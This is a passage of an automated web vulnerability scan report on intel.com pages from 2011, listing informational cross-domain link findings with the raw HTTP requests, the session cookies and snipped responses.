Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37679

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en_us">
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.104. http://www.intel.com/itcenter/products/core/core_vpro/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /itcenter/products/core/core_vpro/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/itcenter/products/core/core_vpro/index.htm?iid=gg_work+home_core-vpro
The response contains the following links to other domains:
  • http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/3310.js
  • http://www.energystar.gov/index.cfm?fuseaction=find_a_product.showProductGroup&pgw_code=CO
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /itcenter/products/core/core_vpro/index.htm?iid=gg_work+home_core-vpro HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47688

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en_us">
...[SNIP]...
rotection Agency, that relies upon all of the system's components, including processor, chipset, power supply, HDD, graphics controller and memory to meet the specification. For more information, see <a href="http://www.energystar.gov/index.cfm?fuseaction=find_a_product.showProductGroup&amp;pgw_code=CO" target="_blank">www.energystar.gov/index.cfm?fuseaction= find_a_product.showProductGroup&amp;pgw_code=CO</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...
<!-- wf - Crazyegg Heatmap -->
<script type="text/javascript" src="http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/3310.js"></script>
...[SNIP]...

17.105. http://www.intel.com/itcenter/products/core/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /itcenter/products/core/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/itcenter/products/core/index.htm?iid=subhdr+itc_core
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /itcenter/products/core/index.htm?iid=subhdr+itc_core HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39625

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en">
<h
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.106. http://www.intel.com/itcenter/products/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /itcenter/products/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/itcenter/products/index.htm?iid=gg_prod-en_US+it_prod
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /itcenter/products/index.htm?iid=gg_prod-en_US+it_prod HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36089

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en">
<h
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.107. http://www.intel.com/itcenter/products/itanium/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /itcenter/products/itanium/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/itcenter/products/itanium/index.htm?iid=subhdr+itc_itanium
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /itcenter/products/itanium/index.htm?iid=subhdr+itc_itanium HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37004

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en">
<h
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.108. http://www.intel.com/itcenter/products/xeon/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /itcenter/products/xeon/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/itcenter/products/xeon/index.htm?iid=subhdr+itc_xeon
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /itcenter/products/xeon/index.htm?iid=subhdr+itc_xeon HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44174

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en">
<h
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.109. http://www.intel.com/itcenter/system/client/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /itcenter/system/client/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/itcenter/system/client/index.htm?iid=subhdr+itc_client
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /itcenter/system/client/index.htm?iid=subhdr+itc_client HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40329

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en">
<h
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.110. http://www.intel.com/itcenter/system/internet_device/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /itcenter/system/internet_device/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/itcenter/system/internet_device/index.htm?iid=subhdr+itc_intdev
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /itcenter/system/internet_device/index.htm?iid=subhdr+itc_intdev HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38205

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en">
<h
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.111. http://www.intel.com/itcenter/system/networking/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /itcenter/system/networking/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/itcenter/system/networking/index.htm?iid=subhdr+itc_networkdev
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /itcenter/system/networking/index.htm?iid=subhdr+itc_networkdev HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; 